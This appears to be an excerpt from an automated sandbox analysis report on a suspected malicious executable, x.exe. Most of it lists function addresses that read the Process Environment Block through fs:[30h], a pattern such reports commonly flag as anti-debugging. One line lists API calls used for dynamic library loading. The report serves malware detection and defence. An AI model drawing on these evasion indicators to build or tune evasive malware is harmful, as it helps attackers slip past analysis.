        Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_73AD2288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov ecx, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov ecx, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov eax, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452D6D0 mov eax, dword ptr fs:[00000030h]3_2_3452D6D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CA6C0 mov eax, dword ptr fs:[00000030h]3_2_345CA6C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345006CF mov eax, dword ptr fs:[00000030h]3_2_345006CF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457C6F2 mov eax, dword ptr fs:[00000030h]3_2_3457C6F2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457C6F2 mov eax, dword ptr fs:[00000030h]3_2_3457C6F2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F96E0 mov eax, dword ptr fs:[00000030h]3_2_344F96E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F96E0 mov eax, dword ptr fs:[00000030h]3_2_344F96E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450C6E0 mov eax, dword ptr fs:[00000030h]3_2_3450C6E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345266E0 mov eax, dword ptr fs:[00000030h]3_2_345266E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345266E0 mov eax, dword ptr fs:[00000030h]3_2_345266E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508690 mov eax, dword ptr fs:[00000030h]3_2_34508690
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458C691 mov eax, dword ptr fs:[00000030h]3_2_3458C691
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF68C mov eax, dword ptr fs:[00000030h]3_2_345BF68C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C86A8 mov eax, dword ptr fs:[00000030h]3_2_345C86A8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C86A8 mov eax, dword ptr fs:[00000030h]3_2_345C86A8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov ecx, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AE750 mov eax, dword ptr fs:[00000030h]3_2_345AE750
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34533740 mov eax, dword ptr fs:[00000030h]3_2_34533740
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453174A mov eax, dword ptr fs:[00000030h]3_2_3453174A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530774 mov eax, dword ptr fs:[00000030h]3_2_34530774
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504779 mov eax, dword ptr fs:[00000030h]3_2_34504779
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504779 mov eax, dword ptr fs:[00000030h]3_2_34504779
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34512760 mov ecx, dword ptr fs:[00000030h]3_2_34512760
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450471B mov eax, dword ptr fs:[00000030h]3_2_3450471B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450471B mov eax, dword ptr fs:[00000030h]3_2_3450471B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF717 mov eax, dword ptr fs:[00000030h]3_2_345BF717
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D700 mov ecx, dword ptr fs:[00000030h]3_2_3450D700
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C970B mov eax, dword ptr fs:[00000030h]3_2_345C970B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C970B mov eax, dword ptr fs:[00000030h]3_2_345C970B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34529723 mov eax, dword ptr fs:[00000030h]3_2_34529723
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF7CF mov eax, dword ptr fs:[00000030h]3_2_345BF7CF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345077F9 mov eax, dword ptr fs:[00000030h]3_2_345077F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345077F9 mov eax, dword ptr fs:[00000030h]3_2_345077F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E7E0 mov eax, dword ptr fs:[00000030h]3_2_3452E7E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34531796 mov eax, dword ptr fs:[00000030h]3_2_34531796
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34531796 mov eax, dword ptr fs:[00000030h]3_2_34531796
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB781 mov eax, dword ptr fs:[00000030h]3_2_345DB781
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB781 mov eax, dword ptr fs:[00000030h]3_2_345DB781
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D17BC mov eax, dword ptr fs:[00000030h]3_2_345D17BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345007A7 mov eax, dword ptr fs:[00000030h]3_2_345007A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34501051 mov eax, dword ptr fs:[00000030h]3_2_34501051
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34501051 mov eax, dword ptr fs:[00000030h]3_2_34501051
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D505B mov eax, dword ptr fs:[00000030h]3_2_345D505B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530044 mov eax, dword ptr fs:[00000030h]3_2_34530044
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507072 mov eax, dword ptr fs:[00000030h]3_2_34507072
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506074 mov eax, dword ptr fs:[00000030h]3_2_34506074
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506074 mov eax, dword ptr fs:[00000030h]3_2_34506074
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345A9060 mov eax, dword ptr fs:[00000030h]3_2_345A9060
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34525004 mov eax, dword ptr fs:[00000030h]3_2_34525004
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34525004 mov ecx, dword ptr fs:[00000030h]3_2_34525004
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508009 mov eax, dword ptr fs:[00000030h]3_2_34508009
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD02D mov eax, dword ptr fs:[00000030h]3_2_344FD02D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451B0D0 mov eax, dword ptr fs:[00000030h]3_2_3451B0D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453D0F0 mov eax, dword ptr fs:[00000030h]3_2_3453D0F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3453D0F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FC0F6 mov eax, dword ptr fs:[00000030h]3_2_344FC0F6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA093 mov ecx, dword ptr fs:[00000030h]3_2_344FA093
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FC090 mov eax, dword ptr fs:[00000030h]3_2_344FC090
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D50B7 mov eax, dword ptr fs:[00000030h]3_2_345D50B7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345400A5 mov eax, dword ptr fs:[00000030h]3_2_345400A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BB0AF mov eax, dword ptr fs:[00000030h]3_2_345BB0AF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453415F mov eax, dword ptr fs:[00000030h]3_2_3453415F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3459314A mov eax, dword ptr fs:[00000030h]3_2_3459314A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D5149 mov eax, dword ptr fs:[00000030h]3_2_345D5149
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506179 mov eax, dword ptr fs:[00000030h]3_2_34506179
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3455717A mov eax, dword ptr fs:[00000030h]3_2_3455717A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3455717A mov eax, dword ptr fs:[00000030h]3_2_3455717A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530118 mov eax, dword ptr fs:[00000030h]3_2_34530118
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF113 mov eax, dword ptr fs:[00000030h]3_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452510F mov eax, dword ptr fs:[00000030h]3_2_3452510F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450510D mov eax, dword ptr fs:[00000030h]3_2_3450510D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF13E mov eax, dword ptr fs:[00000030h]3_2_345BF13E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537128 mov eax, dword ptr fs:[00000030h]3_2_34537128
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34537128 mov eax, dword ptr fs:[00000030h]3_2_34537128
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101C0 mov eax, dword ptr fs:[00000030h]3_2_345101C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101C0 mov eax, dword ptr fs:[00000030h]3_2_345101C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C0 mov eax, dword ptr fs:[00000030h]3_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345101F1 mov eax, dword ptr fs:[00000030h]3_2_345101F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F1F0 mov eax, dword ptr fs:[00000030h]3_2_3452F1F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452F1F0 mov eax, dword ptr fs:[00000030h]3_2_3452F1F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F81EB mov eax, dword ptr fs:[00000030h]3_2_344F81EB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C81EE mov eax, dword ptr fs:[00000030h]3_2_345C81EE
